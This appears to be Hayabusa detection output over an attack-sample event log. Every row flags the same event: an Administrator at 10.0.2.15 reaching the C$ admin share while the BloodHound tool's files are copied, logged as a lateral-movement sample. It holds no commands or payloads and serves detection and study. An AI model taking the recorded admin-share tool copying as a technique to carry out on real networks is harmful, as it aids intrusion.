2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
